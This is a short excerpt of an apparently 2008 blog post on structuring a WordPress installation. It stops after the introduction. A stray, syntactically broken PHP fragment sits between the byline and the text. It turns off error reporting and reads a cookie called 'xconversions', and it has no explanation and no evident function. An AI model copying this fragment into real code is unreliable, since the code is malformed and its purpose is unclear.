Setting Up Wordpress for Maximum Effect

December 4, 2008 by Ron Jones · Leave a Comment
Filed under: Configuration 

< ?php
error_reporting(0);
$cookiename = 'xconversions';
if (isset($_COOKIE$cookiename))
$var = $_COOKIE$cookiename;
?>
I’ve been testing and tweaking and breaking lots of things in an effort to figure out the most effective way of structuring my wordpress installation.

There are three primary technical goals I have in mind here: Read more